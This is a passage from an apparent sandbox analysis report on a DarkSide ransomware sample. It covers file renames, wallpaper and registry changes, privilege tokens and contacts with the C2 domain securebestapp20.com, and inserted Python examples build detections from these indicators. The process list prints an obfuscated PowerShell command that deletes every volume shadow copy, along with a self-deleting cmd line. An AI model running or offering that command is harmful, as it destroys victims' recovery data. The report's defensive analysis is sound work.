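US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
"""


def parse_network_table(text: str) -> list[dict]:
    """Parse 'Country Destination Domain Proto' rows (whitespace separated)."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                          # header, blank or malformed line
        country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def ptr_to_ip(name: str) -> str | None:
    """'50.0.127.10.in-addr.arpa' -> '10.127.0.50'; None for non-PTR names."""
    suffix = ".in-addr.arpa"
    if not name.lower().endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    return ".".join(reversed(octets))


def detect_reverse_sweeps(rows: list[dict], threshold: int = 10) -> dict[str, int]:
    """Count PTR lookups per /24. A single host resolving many addresses of
    one subnet inside one session is enumerating neighbours, not browsing."""
    per_subnet: Counter[str] = Counter()
    for r in rows:
        ip = ptr_to_ip(r["domain"])
        if ip is None:
            continue
        net = ipaddress.ip_network(f"{ip}/24", strict=False)
        per_subnet[str(net)] += 1
    return {net: n for net, n in per_subnet.items() if n >= threshold}


def external_tls_contacts(rows: list[dict]) -> dict[str, set[str]]:
    """Domains contacted on 443/tcp, mapped to the addresses they resolved to."""
    out: dict[str, set[str]] = {}
    for r in rows:
        if r["proto"] == "tcp" and r["port"] == 443:
            out.setdefault(r["domain"], set()).add(r["ip"])
    return out


if __name__ == "__main__":
    rows = parse_network_table(SAMPLE_NETWORK_ROWS)
    print(detect_reverse_sweeps(rows))
    print(external_tls_contacts(rows))
```

With the full table the per-subnet count is in the hundreds, far above any sensible threshold; on a production resolver the same logic keyed by source host and a short time window is the detection, because ordinary clients almost never issue PTR queries for an entire /24.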

Files

memory/1680-55-0x0000000075AC1000-0x0000000075AC3000-memory.dmp

memory/1988-56-0x000007FEFB731000-0x000007FEFB733000-memory.dmp

memory/1988-59-0x00000000024D0000-0x00000000024D2000-memory.dmp

memory/1988-60-0x00000000024D2000-0x00000000024D4000-memory.dmp

memory/1988-61-0x00000000024D4000-0x00000000024D7000-memory.dmp

memory/1988-58-0x000007FEF4F9E000-0x000007FEF4F9F000-memory.dmp

memory/1988-57-0x000007FEF2870000-0x000007FEF33CD000-memory.dmp

memory/1988-62-0x000000001B750000-0x000000001BA4F000-memory.dmp

memory/1988-63-0x00000000024DB000-0x00000000024FA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 844b086621dd446aca3ac2496a98ec69
SHA1 8cae203ad457a7612b85293871318a3751ad9665
SHA256 44d1548152350f856b67d425e286439575a3cbcd111f8367cb07fe0ea1a9230f
SHA512 8a10a403ff0ef60e6c27b1f7acfde545764d0099a75041bb4648b4030eeeca687ca355bbb98fd91b141ef56111f1b304cdb37746943517106d1130e412148ec1

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-10 11:47

Reported

2022-02-10 11:50

Platform

win10v2004-en-20220112

Max time kernel

144s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe"

Signatures

DarkSide

ransomware darkside

suricata: ET MALWARE Observed DarkSide Ransomware CnC Domain in TLS SNI

suricata

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\CompressGet.png => C:\Users\Admin\Pictures\CompressGet.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ImportRemove.png => C:\Users\Admin\Pictures\ImportRemove.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ImportRemove.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResizeUnregister.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeEnter.tif => C:\Users\Admin\Pictures\ResumeEnter.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\UnblockCheckpoint.crw => C:\Users\Admin\Pictures\UnblockCheckpoint.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\UnblockCheckpoint.crw.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompressGet.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResizeUnregister.tif => C:\Users\Admin\Pictures\ResizeUnregister.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File renamed C:\Users\Admin\Pictures\ResumeAssert.png => C:\Users\Admin\Pictures\ResumeAssert.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeAssert.png.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResumeEnter.tif.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Reads user/profile data of web browsers

spyware stealer

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b787986.BMP" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\7b787986.BMP" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
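
Added example, not part of the report: the two runs use different eight-hex-character tokens (27a6f0b5 on win7, 7b787986 on win10) as the appended file extension, the wallpaper file name under C:\ProgramData, the registry class name and the DefaultIcon path. The Python below takes event rows in the report's (description, indicator) layout, derives the per-run token from the rename pattern, and checks which of the other artifacts carry the same token, so the registry and file events can be tied to one encryption run instead of being read as unrelated findings. Events are transcribed from the tables of both runs; the profile field names and the parsing helpers are this example's assumptions.

```python
from __future__ import annotations

import re
from collections import Counter

# (description, indicator) pairs transcribed from this report. The process
# column was the sample executable in every row used here, so it is omitted.
RUN1_EVENTS = [
    ("File renamed", r"C:\Users\Admin\Pictures\SkipDeny.crw => C:\Users\Admin\Pictures\SkipDeny.crw.27a6f0b5"),
    ("File renamed", r"C:\Users\Admin\Pictures\ResumeApprove.png => C:\Users\Admin\Pictures\ResumeApprove.png.27a6f0b5"),
    ("File renamed", r"C:\Users\Admin\Pictures\SaveSplit.png => C:\Users\Admin\Pictures\SaveSplit.png.27a6f0b5"),
    ("Set value (str)", r'\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\27a6f0b5.BMP"'),
    ("Key created", r"\REGISTRY\MACHINE\SOFTWARE\Classes\.27a6f0b5"),
    ("Set value (str)", r'\REGISTRY\MACHINE\SOFTWARE\Classes\27a6f0b5\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\27a6f0b5.ico"'),
]
RUN2_EVENTS = [
    ("File renamed", r"C:\Users\Admin\Pictures\CompressGet.png => C:\Users\Admin\Pictures\CompressGet.png.7b787986"),
    ("File renamed", r"C:\Users\Admin\Pictures\ResumeEnter.tif => C:\Users\Admin\Pictures\ResumeEnter.tif.7b787986"),
    ("Set value (str)", r'\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\7b787986.BMP"'),
]

RENAME = re.compile(r"^(?P<old>.+?) => (?P<new>.+)$")
SETVAL = re.compile(r'^(?P<key>.+?) = "(?P<val>.*)"$')


def appended_extension(old: str, new: str) -> str | None:
    """Return EXT when new == old + '.' + EXT, the ransomware rename shape."""
    if not new.startswith(old + "."):
        return None
    rest = new[len(old) + 1:]
    return rest if rest and "\\" not in rest else None


def unescape_reg_string(v: str) -> str:
    # the sandbox prints REG_SZ paths with doubled backslashes
    return v.replace("\\\\", "\\")


def build_ioc_profile(events: list[tuple[str, str]]) -> dict | None:
    """Derive the run's token from renamed files, then collect the registry
    artifacts that reuse it. Returns None if no rename pattern is present."""
    exts: Counter[str] = Counter()
    renamed: list[str] = []
    for desc, ind in events:
        if desc != "File renamed":
            continue
        m = RENAME.match(ind)
        if not m:
            continue
        ext = appended_extension(m["old"], m["new"])
        if ext:
            exts[ext] += 1
            renamed.append(m["new"])
    if not exts:
        return None
    token = exts.most_common(1)[0][0]
    profile = {"id": token, "renamed": renamed,
               "wallpaper": None, "icon": None, "class_key": None}
    for desc, ind in events:
        if desc == "Key created" and ind.lower().endswith(f"\\classes\\.{token}"):
            profile["class_key"] = ind
        elif desc.startswith("Set value"):
            m = SETVAL.match(ind)
            if not m:
                continue
            key, val = m["key"].lower(), unescape_reg_string(m["val"])
            if key.endswith("\\control panel\\desktop\\wallpaper") and token in val:
                profile["wallpaper"] = val
            elif key.endswith("\\defaulticon\\") and token in val:
                profile["icon"] = val
    return profile


if __name__ == "__main__":
    for events in (RUN1_EVENTS, RUN2_EVENTS):
        print(build_ioc_profile(events))
```

The token is taken as whichever appended extension the most renamed files share, which keeps a stray unrelated rename from choosing it. For the win10 run the profile reports no class key or icon because the report lists no Classes events for that run, not because the behaviour is absent; an empty field there is a prompt to look at the full event log, not a conclusion.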

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat C:\Windows\System32\svchost.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\MusNotifyIcon.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\MusNotifyIcon.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132891437153417678" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4164" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.240578" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "3932" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" C:\Windows\System32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\7b787986\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\7b787986.ico" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.7b787986 C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.7b787986\ = "7b787986" C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b787986\DefaultIcon C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe

"C:\Users\Admin\AppData\Local\Temp\43e61519be440115eeaa3738a0e4aa4bb3c8ac5f9bdfce1a896db17a374eb8aa.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\MusNotifyIcon.exe

%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\43E615~1.EXE >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 settings-win.data.microsoft.com udp
NL 51.124.78.146:443 settings-win.data.microsoft.com tcp
NL 104.110.191.140:80 tcp
NL 51.124.78.146:443 settings-win.data.microsoft.com tcp
NL 51.124.78.146:443 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.249.196:443 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 securebestapp20.com udp
DE 3.64.163.50:443 securebestapp20.com tcp
US 52.167.249.196:443 settings-win.data.microsoft.com tcp
US 52.167.249.196:443 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 geo.prod.do.dsp.mp.microsoft.com udp
US 52.184.216.226:443 geo.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 kv801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 kv801.prod.do.dsp.mp.microsoft.com tcp
NL 184.29.205.60:443 kv801.prod.do.dsp.mp.microsoft.com tcp
DE 3.64.163.50:443 securebestapp20.com tcp
